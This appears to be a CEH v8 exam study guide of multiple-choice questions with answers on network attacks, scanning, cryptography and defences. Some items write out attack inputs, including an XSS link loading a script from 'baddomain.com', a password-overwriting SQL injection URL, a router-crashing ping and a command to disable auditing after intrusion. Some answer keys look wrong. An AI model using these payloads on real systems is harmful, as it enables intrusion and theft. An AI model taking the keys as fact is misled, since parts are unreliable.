Certified Ethical Hacking (CEH) v.8 Study Guide part 2 (101-200)
How does a denial-of-service attack work? A. A hacker prevents a legitimate user (or group of users) from accessing a service B. A hacker uses every character,word,or letter he or she can think of to defeat authentication C. A hacker tries to decipher a password by using a system,which subsequently crashes the network D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
A. A hacker prevents a legitimate user (or group of users) from accessing a service
A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? A. A buffer overflow attack has been attempted B. A buffer overflow attack has already occurred C. A firewall has been breached and this is logged D. An intrusion detection system has been triggered E. The system has crashed
A. A buffer overflow attack has been attempted
Bill is a security analyst for his company. All the switches used in the company's office are Cisco switches. Bill wants to make sure all switches are safe from ARP poisoning. How can Bill accomplish this? A. Bill can use the command: ip dhcp snooping. B. Bill can use the command: no ip snoop. C. Bill could use the command: ip arp no flood. D. He could use the command: ip arp no snoop.
A. Bill can use the command: ip dhcp snooping.
Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bob can explain that a random number generator can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error
A. Bob can explain that using a weak key management technique is a form of programming error
WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled B. Place authentication on root directories that will prevent crawling from these spiders C. Enable SSL on the restricted directories which will block these spiders from crawling D. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index
A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled
Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time? A. Brute force attack B. Birthday attack C. Dictionary attack D. Brute service attack
A. Brute force attack
Charlie is the network administrator for his company. Charlie just received a new Cisco router and wants to test its capabilities out and to see if it might be susceptible to a DoS attack resulting in its locking up. The IP address of the Cisco switch is 172.16.0.45. What command can Charlie use to attempt this task? A. Charlie can use the commanD. ping -l 56550 172.16.0.45 -t. B. Charlie can try using the commanD. ping 56550 172.16.0.45. C. By using the command ping 172.16.0.45 Charlie would be able to lockup the router D. He could use the commanD. ping -4 56550 172.16.0.45.
A. Charlie can use the commanD. ping -l 56550 172.16.0.45 -t.
This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. <ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E">See foobar</a> What is this attack? A. Cross-site-scripting attack B. SQL Injection C. URL Traversal attack D. Buffer Overflow attack
A. Cross-site-scripting attack
The SNMP Read-Only Community String is like a password. The string is sent along with each SNMP Get-Request and allows (or denies) access to a device. Most network vendors ship their equipment with a default password of "public". This is the so-called "default public community string". How would you keep intruders from getting sensitive information regarding the network devices using SNMP? (Select 2 answers) A. Enable SNMPv3 which encrypts username/password authentication B. Use your company name as the public community string replacing the default 'public' C. Enable IP filtering to limit access to SNMP device D. The default configuration provided by device vendors is highly secure and you don't need to change anything
A. Enable SNMPv3 which encrypts username/password authentication C. Enable IP filtering to limit access to SNMP device
One of the most common and the best way of cracking RSA encryption is to begin to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _____________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing
A. Factorization
John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the Firewall logs and he notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. Enable the IDS to filter encrypted HTTPS traffic C. Install a hardware SSL "accelerator" and terminate SSL at this layer D. Enable the Firewall to filter encrypted HTTPS traffic
A. Install a proxy server and terminate SSL at the proxy C. Install a hardware SSL "accelerator" and terminate SSL at this layer
You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next? A. Run NULL TCP hping2 against 192.168.1.10 B. Run nmap XMAS scan against 192.168.1.10 C. The firewall is blocking all the scans to 192.168.1.10 D. Use NetScan Tools Pro to conduct the scan
A. Run NULL TCP hping2 against 192.168.1.10
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result? A. The switches will drop into hub mode if the ARP cache is successfully flooded. B. If the ARP cache is flooded,the stitches will drop into pix mode making it less susceptible to attacks. C. Depending on the switch manufacturer,the device will either delete every entry in its ARP cache or reroute packets to the nearest switch. D. The switches will route all traffic to the broadcast address created collisions.
A. The switches will drop into hub mode if the ARP cache is successfully flooded.
Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response? A. These ports are open because they do not illicit a response. B. He can tell that these ports are in stealth mode. C. If a port does not respond to an XMAS scan using NMAP,that port is closed. D. The scan was not performed correctly using NMAP since all ports,no matter what their state,will illicit some sort of response from an XMAS scan.
A. These ports are open because they do not illicit a response.
You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place. Your peer, Peter Smith who works at the same department disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of "weakest link" in the security chain. What is Peter Smith talking about? A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain B. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks C. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks D. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway
A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain
Yancey is a network security administrator for a large electric company. This company provides power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered? A. Yancey would be considered a Suicide Hacker B. Since he does not care about going to jail,he would be considered a Black Hat C. Because Yancey works for the company currently; he would be a White Hat D. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing
A. Yancey would be considered a Suicide Hacker
In which location are SAM hash passwords are stored in Windows 7? A. c:\windows\system32\config\SAM B. c:\winnt\system32\machine\SAM C. c:\windows\etc\drivers\SAM D. c:\windows\config\etc\SAM
A. c:\windows\system32\config\SAM
Identify SQL injection attack from the HTTP requests shown below: A. http://www.myserver.c0m/search.asp? lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00 B. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22 C. http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e D. http://www.victim.com/example accountnumber=67891&creditamount=999999999
A. http://www.myserver.c0m/search.asp? lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00
What is the command used to create a binary log file using tcpdump? A. tcpdump -w ./log B. tcpdump -r log C. tcpdump -vde logtcpdump -vde ? log D. tcpdump -l /var/log/
A. tcpdump -w ./log
Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. A. true B. false
A. true
What port number is used by LDAP protocol? A. 110 B. 389 C. 464 D. 445
B. 389
What type of encryption does WPA2 use? A. DES 64 bit B. AES-CCMP 128 bit C. MD5 48 bit D. SHA 160 bit
B. AES-CCMP 128 bit
When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack? A. Attacker generates TCP SYN packets with random destination addresses towards a victim host B. Attacker floods TCP SYN packets with random source addresses towards a victim host C. Attacker generates TCP ACK packets with random source addresses towards a victim host D. Attacker generates TCP RST packets with random source addresses towards a victim host
B. Attacker floods TCP SYN packets with random source addresses towards a victim host
Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called? A. Information Audit Policy (IAP) B. Information Security Policy (ISP) C. Penetration Testing Policy (PTP) D. Company Compliance Policy (CCP)
B. Information Security Policy (ISP)
Which definition below best describes a covert channel? A. A server program using a port that is not well known B. Making use of a protocol in a way it was not intended to be used C. It is the multiplexing taking place on a communication link D. It is one of the weak channels used by WEP that makes it insecure
B. Making use of a protocol in a way it was not intended to be used
"Testing the network using the same methodologies and tools employed by attackers" Identify the correct terminology that defines the above statement. A. Vulnerability Scanning B. Penetration Testing C. Security Policy Implementation D. Designing Network Security
B. Penetration Testing
Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? A. They are using UDP that is always authorized at the firewall B. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended C. They have been able to compromise the firewall,modify the rules,and give themselves proper access D. They are using an older version of Internet Explorer that allow them to bypass the proxy server
B. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed? A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network B. Try to hang around the local pubs or restaurants near the bank,get talking to a poorly-paid or disgruntled employee,and offer them money if they'll abuse their access privileges by providing you with sensitive information C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots" D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques
B. Try to hang around the local pubs or restaurants near the bank,get talking to a poorly-paid or disgruntled employee,and offer them money if they'll abuse their access privileges by providing you with sensitive information
File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers? A. Use disable-eXchange B. Use mod_negotiation C. Use Stop_Files D. Use Lib_exchanges
B. Use mod_negotiation
A digital signature is simply a message that is encrypted with the public key instead of the private key. A. true B. false
B. false
In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them: FIN = 1 SYN = 2 RST = 4 PSH = 8 ACK = 16 URG = 32 ECE = 64 CWR =128 Example: To calculate SYN/ACK flag decimal value, add 2 (which is the decimal value of the SYN flag) to 16 (which is the decimal value of the ACK flag), so the result would be 18. Based on the above calculation, what is the decimal value for XMAS scan? A. 23 B. 24 C. 41 D. 64
C. 41
Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software? A. Steganography B. Wrapping C. ADS D. Hidden Channels
C. ADS
Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next? A. Take over the session B. Reverse sequence prediction C. Guess the sequence numbers D. Take one of the parties offline
C. Guess the sequence numbers
Which type of password cracking technique works like dictionary attack but adds some numbers and symbols to the words from the dictionary and tries to crack the password? A. Dictionary attack B. Brute forcing attack C. Hybrid attack D. Syllable attack E. Rule-based attack
C. Hybrid attack
This TCP flag instructs the sending system to transmit all buffered data immediately. A. SYN B. RST C. PSH D. URG E. FIN
C. PSH
What do you call a pre-computed hash? A. Sun tables B. Apple tables C. Rainbow tables D. Moon tables
C. Rainbow tables
Within the context of Computer Security, which of the following statements describes Social Engineering best? A. Social Engineering is the act of publicly disclosing information B. Social Engineering is the means put in place by human resource to perform time accounting C. Social Engineering is the act of getting needed information from a person rather than breaking into a system D. Social Engineering is a training program within sociology studies
C. Social Engineering is the act of getting needed information from a person rather than breaking into a system
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to a proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What proxy tool has Gerald's attacker used to cover their tracks? A. ISA proxy B. IAS proxy C. TOR proxy D. Cheops proxy
C. TOR proxy
NTP allows you to set the clocks on your systems very accurately, to within 100ms and sometimes-even 10ms. Knowing the exact time is extremely important for enterprise security. Various security protocols depend on an accurate source of time information in order to prevent "playback" attacks. These protocols tag their communications with the current time, to prevent attackers from replaying the same communications, e.g., a login/password interaction or even an entire communication, at a later date. One can circumvent this tagging, if the clock can be set back to the time the communication was recorded. An attacker attempts to try corrupting the clocks on devices on your network. You run Wireshark to detect the NTP traffic to see if there are any irregularities on the network. What port number you should enable in Wireshark display filter to view NTP packets? A. TCP Port 124 B. UDP Port 125 C. UDP Port 123 D. TCP Port 126
C. UDP Port 123
You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion? A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account B. Package the Sales.xls using Trojan wrappers and telnet them back your home computer C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques D. Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account
C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques
Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this? A. RST flag scanning B. FIN flag scanning C. SYN flag scanning D. ACK flag scanning
D. ACK flag scanning
NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to intercept the traffic from a victim machine to a corporate network printer. You are attempting to hijack the printer network connection from your laptop by sniffing the wire. Which port does SMB over TCP/IP use? A. 443 B. 139 C. 179 D. 445
D. 445
What is the IV key size used in WPA2? A. 32 B. 24 C. 16 D. 48 E. 128
D. 48 Explanation: Every WPA key includes a 48 bit IV key,which creates 500 trillion combinations and is a stronger encryption compared to WEP. With so many combinations,the possibility of the encryption key reuse is lesser and therefore the encryption can endure hacking attacks better than WEP. WPA does not make direct use of the master encryption keys and has a message integrity checking facility.
Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msG. "mountd access";) A. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111 B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet C. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111
D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111
Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this? A. Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer. B. He can send an IP packet with the SYN bit and the source address of his computer. C. Fred can send an IP packet with the ACK bit set to zero and the source address of the switch. D. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.
D. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.
To see how some of the hosts on your network react, Winston sends out SYN packets to an IP range. A number of IPs respond with a SYN/ACK response. Before the connection is established he sends RST packets to those hosts to stop the session. Winston has done this to see how his intrusion detection system will log the traffic. What type of scan is Winston attempting here? A. Winston is attempting to find live hosts on your company's network by using an XMAS scan. B. He is utilizing a SYN scan to find live hosts that are listening on your network. C. This type of scan he is using is called a NULL scan. D. He is using a half-open scan to find live hosts on your network.
D. He is using a half-open scan to find live hosts on your network.
What is the default Password Hash Algorithm used by NTLMv2? A. MD4 B. DES C. SHA-1 D. MD5
D. MD5
Which of the following encryption is NOT based on block cipher? A. DES B. Blowfish C. AES (Rijndael) D. RC4
D. RC4
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? A. MD5 B. PGP C. RSA D. SSH
D. SSH
Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company's strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication? A. Biometric device B. OTP C. Proximity cards D. Security token
D. Security token
Why attackers use proxy servers? A. To ensure the exploits used in the attacks always flip reverse vectors B. Faster bandwidth performance and increase in attack speed C. Interrupt the remote victim's network traffic and reroute the packets to attackers machine D. To hide the source IP address so that an attacker can hack without any legal corollary
D. To hide the source IP address so that an attacker can hack without any legal corollary
You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability. Which command will you run to disable auditing from the cmd? A. stoplog stoplog ? B. EnterPol /nolog C. EventViewer o service D. auditpol.exe /disable
D. auditpol.exe /disable
In which step Steganography fits in CEH System Hacking Cycle (SHC) A. Step 2: Crack the password B. Step 1: Enumerate users C. Step 3: Escalate privileges D. Step 4: Execute applications E. Step 5: Hide files F. Step 6: Cover your tracks
E. Step 5: Hide files
You are writing security policy that hardens and prevents Footprinting attempt by Hackers. Which of the following countermeasures will NOT be effective against this attack? A. Configure routers to restrict the responses to Footprinting requests B. Configure Web Servers to avoid information leakage and disable unwanted protocols C. Lock the ports with suitable Firewall configuration D. Use an IDS that can be configured to refuse suspicious traffic and pick up Footprinting patterns E. Evaluate the information before publishing it on the Website/Intranet F. Monitor every employee computer with Spy cameras,keyloggers and spy on them G. Perform Footprinting techniques and remove any sensitive information found on DMZ sites H. Prevent search engines from caching a Webpage and use anonymous registration services I. Disable directory and use split-DNS
F. Monitor every employee computer with Spy cameras,keyloggers and spy on them